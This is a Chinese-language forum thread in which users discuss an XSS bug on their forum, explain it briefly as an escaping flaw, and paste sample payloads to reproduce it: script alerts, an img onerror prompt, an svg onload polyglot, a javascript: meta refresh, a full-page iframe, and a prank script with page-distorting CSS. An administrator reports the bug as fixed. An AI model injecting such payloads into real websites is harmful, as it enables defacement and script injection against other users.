来围观奶昔有趣的bug
应该需要电脑打开https://forum.naixi.net/forum.php?mod=viewthread&tid=8083&page=1
----
科普:这种bug叫做注入(XSS),某些字符处理不严谨或者转义不严谨导致的
乐,在这个贴子里试试看能不能复现
<?xml
version="1.0" encoding="utf-8"?>
<root><!]></root>
/>/>/>
<script>alert('奶希天下第一可爱!!大声')</script>
<img src/onerror=prompt(8)>
javascript:/*--></title></style></textarea></script></xmp>
<svg/onload='+/"`/+/onmouseover=1/+/[*/[]/+alert(42);//'>
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
</ 已修复。 xss?要不加个阅读权限 怎么搞起 XSS 来了。。。DZ 的 Bug 还是多啊。 nyarime 发表于 2025-12-23 11:45
已修复。
双击666 999999 nyarime 发表于 2025-12-23 11:45
已修复。
我还没上车呢{:zhemo:} 本帖最后由 moe 于 2025-12-23 18:56 编辑
</iframe></script><script>for (let i = 0, j=6; i <100; i+=j, j*=2)alert('正在饮用奶昔中... 进度 ' + i + '%')//</script><style>*{animation:hue 12s linear infinite;background:linear-gradient(90deg in oklch longer hue,oklch(70% .25 0),oklch(70% .25 360));color:transparent;background-clip:text;-webkit-background-clip:text;}@keyframes hue{to{filter:hue-rotate(360deg)}}div{transition:transform 1000s ease}div:hover{transform:scale(0.5) rotate(360deg)}</style> 牛皮 卡就完事了
页:
[1]